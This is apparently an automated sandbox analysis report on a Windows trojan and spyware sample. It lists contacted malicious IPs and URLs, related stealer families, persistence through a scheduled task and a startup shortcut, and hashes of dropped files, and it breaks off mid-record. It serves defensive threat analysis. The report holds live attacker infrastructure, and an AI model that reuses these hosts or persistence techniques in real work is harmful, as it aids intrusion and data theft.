http://18.141.10.107/pfrsudgx	alg.exe, 00000007.00000003.2384400475.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2391388001.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2417407058.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2426939526.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2434482436.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2399070234.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	false
http://47.129.31.212/1	alg.exe, 00000007.00000003.2155129911.000000000059E000.00000004.00000020.00020000.00000000.sdmp	false
http://18.141.10.107/lW0Qw$	alg.exe, 00000007.00000003.1954297938.000000000059E000.00000004.00000020.00020000.00000000.sdmp	false
http://47.129.31.212/ikqjeeswprlgw	alg.exe, 00000007.00000003.2155129911.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2173196007.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2155129911.00000000005BB000.00000004.00000020.00020000.00000000.sdmp	false
http://13.251.16.150/nnwqsplqbcbox	alg.exe, 00000007.00000003.2274221241.00000000005EC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2280774481.00000000005EC000.00000004.00000020.00020000.00000000.sdmp	false
http://208.117.43.225/	alg.exe, 00000007.00000003.2338272078.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2356395367.000000000059E000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id5Response	build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	false
http://82.112.184.197/	alg.exe, 00000007.00000003.2060275574.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2100203813.000000000059E000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id10Response	build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id8Response	build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id22LR	build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	false
http://13.251.16.150/lehnxiwprl	alg.exe, 00000007.00000003.2173196007.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	false
http://34.246.200.160:80/nuxquhjmvumP	alg.exe, 00000007.00000003.2678116893.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2660841464.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	false
http://44.221.84.105:80/yyvfretnbpwpuxhl	alg.exe, 00000007.00000003.1972176897.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.1971543237.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	false
http://ww12.przvgke.biz:80/qbfrwab?usid=25&utid=8703404410X	alg.exe, 00000007.00000003.1991140646.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	false
http://3.94.10.34/oyfrpxy01ad4	alg.exe, 00000007.00000003.2529365991.00000000005E8000.00000004.00000020.00020000.00000000.sdmp	false
http://18.246.231.120:80/eqmwmfvyliwj	alg.exe, 00000007.00000003.2426939526.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
165.160.15.20	myups.biz	United States	19574	CSCUS	false
3.254.94.185	brsua.biz	United States	16509	AMAZON-02US	false
3.94.10.34	ytctnunms.biz	United States	14618	AMAZON-AESUS	false
34.246.200.160	tbjrpv.biz	United States	16509	AMAZON-02US	false
35.164.78.200	nqwjmb.biz	United States	16509	AMAZON-02US	false
199.59.243.228	76899.bodis.com	United States	395082	BODIS-NJUS	false
51.195.88.199	s82.gocheapweb.com	France	16276	OVHFR	true
212.162.149.53	unknown	Netherlands	64236	UNREAL-SERVERSUS	true
34.227.7.138	gnqgo.biz	United States	14618	AMAZON-AESUS	false
208.117.43.225	gytujflc.biz	United States	32748	STEADFASTUS	false
72.52.178.23	przvgke.biz	United States	32244	LIQUIDWEBUS	false
76.223.26.96	084725.parkingcrew.net	United States	16509	AMAZON-02US	false
44.221.84.105	npukfztj.biz	United States	14618	AMAZON-AESUS	false
85.214.228.140	dlynankz.biz	Germany	6724	STRATOSTRATOAGDE	false
54.244.188.177	pywolwnvd.biz	United States	16509	AMAZON-02US	false
13.251.16.150	sxmiywsfv.biz	United States	16509	AMAZON-02US	false
47.129.31.212	xlfhhhm.biz	Canada	34533	ESAMARA-ASRU	false
18.246.231.120	vrrazpdh.biz	United States	16509	AMAZON-02US	false
104.26.13.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
82.112.184.197	vjaxhpbji.biz	Russian Federation	43267	FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU	false
18.141.10.107	warkcdu.biz	United States	16509	AMAZON-02US	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587629
Start date and time:	2025-01-10 16:00:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 14m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	3
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	RJKUWSGxej.exe renamed because original name is a hash value
Original Sample Name:	5a1e020c5c5ad435e9bb8cd1d76d10a88f9312f2622ddcaf4b4b559e37e8a992.exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.expl.evad.winEXE@37/148@61/21
EGA Information:	Successful, ratio: 58.3%
HCA Information:	Successful, ratio: 68% Number of executed functions: 199 Number of non-executed functions: 90
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, DiagnosticsHub.StandardCollector.Service.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target TrojanAIbot.exe, PID 7660 because it is empty
Execution Graph export aborted for target TrojanAIbot.exe, PID 8088 because it is empty
Execution Graph export aborted for target neworigin.exe, PID 7012 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7324 because it is empty
Execution Graph export aborted for target server_BTC.exe, PID 7044 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
10:01:26	API Interceptor	50x Sleep call for process: powershell.exe modified
10:01:29	API Interceptor	61x Sleep call for process: alg.exe modified
10:01:29	API Interceptor	1075796x Sleep call for process: neworigin.exe modified
10:01:32	API Interceptor	389912x Sleep call for process: TrojanAIbot.exe modified
15:01:31	Task Scheduler	Run new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
15:01:32	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
165.160.15.20	Order SMG 201906 20190816order.pdf.scr.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	myups.biz/mghrypnodi
	C6dAUcOA6M.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	myups.biz/uwugf
	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	myups.biz/rjreynucnxubyan
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	myups.biz/lje
	AENiBH7X1q.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	myups.biz/mwix
	E_dekont.cmd	Get hash	malicious	DBatLoader, Nitol, PureLog Stealer, XWorm	Browse	myups.biz/nur
	Y2EM7suNV5.exe	Get hash	malicious	MassLogger RAT	Browse	myups.biz/rexvoyt
	AsusSetup.exe	Get hash	malicious	Unknown	Browse	myups.biz/afgoll
	AsusSetup.exe	Get hash	malicious	Unknown	Browse	myups.biz/euqwoqq
	RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	myups.biz/ewwexq
3.254.94.185	Order SMG 201906 20190816order.pdf.scr.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	uaafd.biz/rmkysabgpk
	C6dAUcOA6M.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	brsua.biz/xp
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	ocsvqjg.biz/luiqxxselqgi
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	uaafd.biz/cje
	AENiBH7X1q.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	ocsvqjg.biz/cm
	E_dekont.cmd	Get hash	malicious	DBatLoader, Nitol, PureLog Stealer, XWorm	Browse	uaafd.biz/byhbnbikqcomemw
	Y2EM7suNV5.exe	Get hash	malicious	MassLogger RAT	Browse	ocsvqjg.biz/llnmgshpkylde
	AsusSetup.exe	Get hash	malicious	Unknown	Browse	ocsvqjg.biz/jw
	SetupRST.exe	Get hash	malicious	Unknown	Browse	ocsvqjg.biz/xrujxccjxeybqwu
	AsusSetup.exe	Get hash	malicious	Unknown	Browse	ocsvqjg.biz/cly

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
vjaxhpbji.biz	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	82.112.184.197
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	82.112.184.197
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	82.112.184.197
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	82.112.184.197
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	82.112.184.197
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	82.112.184.197
	Ziraat_Swift.hta	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	82.112.184.197
	RFQ_PO N89397-GM7287-Order.bat.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	82.112.184.197
	invoice_96.73.exe	Get hash	malicious	FormBook	Browse	82.112.184.197
	Order SMG 201906 20190816order.pdf.scr.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	82.112.184.197
s82.gocheapweb.com	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	51.195.88.199
	Order SMG 201906 20190816order.pdf.scr.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	51.195.88.199
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Get hash	malicious	AgentTesla, MassLogger RAT, Phoenix Stealer, PureLog Stealer, RedLine, XWorm	Browse	51.195.88.199
	C6dAUcOA6M.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	51.195.88.199
	2jbMIxCFsK.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse	51.195.88.199
	RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse	51.195.88.199
	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	51.195.88.199
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	51.195.88.199
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	51.195.88.199
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	51.195.88.199
76899.bodis.com	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	199.59.243.227
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	199.59.243.227
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	199.59.243.227
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	199.59.243.227
	Ziraat_Swift.hta	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	199.59.243.227
	http://readabilityscore.com	Get hash	malicious	Unknown	Browse	199.59.243.226
	http://bonalluterser.com/	Get hash	malicious	Unknown	Browse	199.59.243.226
	file.exe	Get hash	malicious	LummaC, Glupteba, SmokeLoader, Stealc, Xmrig	Browse	199.59.243.225
	S23UhdW5DH.exe	Get hash	malicious	LummaC, Glupteba, SmokeLoader, Socks5Systemz, Stealc	Browse	199.59.243.225
	xPUqa4qbDL.js	Get hash	malicious	Unknown	Browse	199.59.242.153
pywolwnvd.biz	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	54.244.188.177
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	54.244.188.177
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	54.244.188.177
	INV_NE_02_2034388.exe	Get hash	malicious	FormBook	Browse	54.244.188.177
	Shipment Notification.exe	Get hash	malicious	FormBook	Browse	54.244.188.177
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	54.244.188.177
	MA-DS-2024-03 URGENT.exe	Get hash	malicious	FormBook	Browse	54.244.188.177
	Request for Quotation.exe	Get hash	malicious	FormBook	Browse	54.244.188.177
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	54.244.188.177
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	54.244.188.177

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	TU0kiz3mxz.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	https://booking.extrantelabelason.com/	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	18.245.31.49
	https://samantacatering.com/	Get hash	malicious	Unknown	Browse	99.86.4.125
	https://www.filemail.com/d/rxythqchkhluipl?skipreg=true	Get hash	malicious	Unknown	Browse	18.245.46.20
	vevhea4.elf	Get hash	malicious	Unknown	Browse	54.171.230.55
	file.elf	Get hash	malicious	Unknown	Browse	13.251.16.150
	file.elf	Get hash	malicious	Unknown	Browse	13.251.16.150
	file.elf	Get hash	malicious	Unknown	Browse	54.171.230.55
	file.elf	Get hash	malicious	Unknown	Browse	54.217.10.153
	https://app.planable.io/review/0OPaw36t6M_k	Get hash	malicious	HTMLPhisher	Browse	52.17.171.17
AMAZON-AESUS	https://samantacatering.com/	Get hash	malicious	Unknown	Browse	54.196.108.80
	https://www.filemail.com/d/rxythqchkhluipl?skipreg=true	Get hash	malicious	Unknown	Browse	18.208.66.204
	sora.arm.elf	Get hash	malicious	Mirai	Browse	100.25.242.38
	http://arpaeq.ca	Get hash	malicious	Unknown	Browse	23.23.49.179
	5b118cb6-e85d-926b-b917-b9317aeed46c.eml	Get hash	malicious	Unknown	Browse	54.235.205.181
	https://Covid19.protected-forms.com/XbzFOWGtmMFBFWHdHRklWcjBnd3prY2tUQ3NVdmpyVjExSzNkakhIQ0ExYnJrOEkyWXB1SDVlRURTTEVkV2hReGhCbXIvQVkvSzZVT3VkcnF3eWN2RDdsSVNERC9FdkdSYVBQdDBGM0kwbmFZM3hmYjlGNURDY2JnQTdIZGgyai9vTkg5THFhVFRrT3BQZ1IxM1d0NXFxR01MUlZkNWZXYzRLQjhPSFBEMTB4UXpsUlc5SSt0SVA1VHJTcSt0OVh4LS1PS2hTVDJHTlVlUGZRZmdTLS1JV2t4SnVyT2hYL1I2bWZ6bmQ5RFNRPT0=?cid=2331529927	Get hash	malicious	KnowBe4	Browse	34.193.6.123
	https://app.planable.io/review/0OPaw36t6M_k	Get hash	malicious	HTMLPhisher	Browse	35.170.228.5
	https://we.tl/t-fnebgmrnYQ	Get hash	malicious	Unknown	Browse	34.192.41.140
	http://18ofcontents.shop	Get hash	malicious	Unknown	Browse	34.196.58.29
	5.elf	Get hash	malicious	Unknown	Browse	54.27.198.236
CSCUS	6.elf	Get hash	malicious	Unknown	Browse	169.233.28.192
	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	165.160.13.20
	letter_sjoslin_odeonuk.com.pdf	Get hash	malicious	Unknown	Browse	165.160.13.20
	Order SMG 201906 20190816order.pdf.scr.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	165.160.15.20
	C6dAUcOA6M.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	165.160.15.20
	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	165.160.15.20
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	165.160.15.20
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	165.160.13.20
	AENiBH7X1q.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	165.160.13.20
	E_dekont.cmd	Get hash	malicious	DBatLoader, Nitol, PureLog Stealer, XWorm	Browse	165.160.13.20
AMAZON-02US	TU0kiz3mxz.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	https://booking.extrantelabelason.com/	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	18.245.31.49
	https://samantacatering.com/	Get hash	malicious	Unknown	Browse	99.86.4.125
	https://www.filemail.com/d/rxythqchkhluipl?skipreg=true	Get hash	malicious	Unknown	Browse	18.245.46.20
	vevhea4.elf	Get hash	malicious	Unknown	Browse	54.171.230.55
	file.elf	Get hash	malicious	Unknown	Browse	13.251.16.150
	file.elf	Get hash	malicious	Unknown	Browse	13.251.16.150
	file.elf	Get hash	malicious	Unknown	Browse	54.171.230.55
	file.elf	Get hash	malicious	Unknown	Browse	54.217.10.153
	https://app.planable.io/review/0OPaw36t6M_k	Get hash	malicious	HTMLPhisher	Browse	52.17.171.17

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	7DpzcPcsTS.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	B8FnDUj8hy.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	FSRHC6mB16.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	9pIm5d0rsW.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	104.26.13.205
	B7N48hmO78.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.26.13.205
	VIAmJUhQ54.exe	Get hash	malicious	MassLogger RAT	Browse	104.26.13.205
	VYLigyTDuW.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	QUOTATION-9044456778.pdf (83kb).com.exe	Get hash	malicious	PureLog Stealer, Quasar	Browse	104.26.13.205
	PO#17971.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.26.13.205
	https://sign.zoho.com/zsguest?locale=en&sign_id=234b4d535f4956237c699124bb06f6840075804affff79070f72fbd27ec4885c3a2ba06657b8a52338eb80052baee9f74c4e2e0e7f85c073df939f1ac4dff75f76c95d46ac2361c7b14335e4f12c5c5d49c49b1d2f4c838a&action_type=SIGN	Get hash	malicious	Unknown	Browse	104.26.13.205

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1353216
Entropy (8bit):	5.324374060587854
Encrypted:	false
SSDEEP:	12288:SC4VQjGARQNhilXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:SOCAR0ilsqjnhMgeiCl7G0nehbGZpbD
MD5:	3EC27C1F74E628B70C6947590CA20B8E
SHA1:	028135A95FB1D21573E0D777D3201DD7DABE82DF
SHA-256:	C0187C3E1C9B0D0DA752A040B16F019504FA9B52267CAF4C10F34C94CC580812
SHA-512:	757C483185C0884B42E81E2FB59B9BD32D4BDCDDFA69FC52F32E9CBF85172A63AC33AD5D433AE03A2496F7E253890A7540F04B395FBB02495A0A5A31ED8C9009
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.~.2.-.2.-.2.-n.G-.2.-n.E-J2.-n.D-.2.-.Z.,.2.-.Z.,.2.-.Z.,.2.-.J%-.2.-.2.-.2.-.[.,.2.-.[I-.2.-.2!-.2.-.[.,.2.-Rich.2.-........................PE..L...g.(c.....................6......&........0....@...........................!.............................................,b..<....p...............................L..8............................L..@............0..,............................text............................... ..`.rdata...8...0...:..."..............@..@.data........p.......\..............@....rsrc....P...p...@...f..............@...................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\Au3Info.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1294848
Entropy (8bit):	5.282685956013951
Encrypted:	false
SSDEEP:	12288:hNUpaKghuXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:hCMKgcsqjnhMgeiCl7G0nehbGZpbD
MD5:	E51237D1CF3D26C6150DF7D891991409
SHA1:	4D2B092BF3E936F9EE9B63755FBF9B5DEFF24DC3
SHA-256:	BC8B2FCD5793C60F0C982F069607A420BE46D12896E6DFDF1B3E66D293E38626
SHA-512:	1EC83C1A7E8775690889AA7EF98F9EBA8ED751F1D077728D68EC56BC58B0BC46AFA2C1F8FBD21A10B520B21E2B1E5DE409DA2591A0B37DE3F54A38CD4A375B1B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........jZ..9Z..9Z..9...9Q..9...9%..9...9B..9...8r..9...8K..9...8H..9S.x9W..9Z..9..9...8]..9...9[..9Z.\|9[..9...8[..9RichZ..9........PE..L...C.(c.........."......:...........\.......P....@........................... .............................................$...........0..............................8...............................@............P...............................text...19.......:.................. ..`.rdata...\|...P...~...>..............@..@.data...............................@....rsrc...0...........................@..@.reloc...`...`...P...r..............@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1314304
Entropy (8bit):	5.274132057545172
Encrypted:	false
SSDEEP:	12288:2MEhwdbTZXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:sKdHZsqjnhMgeiCl7G0nehbGZpbD
MD5:	5E696695ADBD2A5D7B3B86D90A061BA9
SHA1:	A8ED74896F78E10B2407C4C43DBFC1ECD3764F74
SHA-256:	A2EAD0A64631287743091480E2A43A5D96D1A156BB7E1F022032A3CB88D6209E
SHA-512:	598E579267AD507FC49B068633193A65A9F0D0AF0C8D9B747FE42CB223B844AD958EE38D71DFCD68CF844A374069CE7B1A83676A8775651346B76E76ECDE6C6D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9..X...X...X..-....X..-....X..-....X...0...X...0...X...0...X... n..X...X..YX..<1.X..<1...X...Xj..X..<1...X..Rich.X..........................PE..d...G.(c.........."......J...^......Tr.........@............................. !........... .................................................,........ ..0...............................8............................................`..`............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data........ ......................@....pdata..............................@..@.rsrc...0.... ......."..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2203136
Entropy (8bit):	7.647025678911684
Encrypted:	false
SSDEEP:	49152:AK0eqkSR7Xgo4TiRPnLWvJFDmg27RnWGj:AK0pR7Xn4TiRCvJFD527BWG
MD5:	CE0E5DE5D11BE575659931F4F5B0E371
SHA1:	64D55D1A291A7B4642F91769EFD903AD93004014
SHA-256:	1921F18840BAC4B6817BC1AA4E038BD378B28E2A603CF02D7642788C10ADF43F
SHA-512:	A3C6773C397C22EA3141A95048575899B74C5045D07322533A6C2B7DC432612C517FE5FD4CDD61A4BB78C400660E30866B6A0D1FEDCE6F62D9E297FEB011D87A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................Y;6....Y;4.x...Y;5...........................D......T...........H......H.8.....P....H......Rich...................PE..L...9.(c..........#..................d............@...........................".......!..............................................p..X...............................p...............................@...............X............................text.............................. ..`.rdata..$H.......J..................@..@.data....@... ......................@....rsrc........p......................@...................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2369024
Entropy (8bit):	7.565048734383233
Encrypted:	false
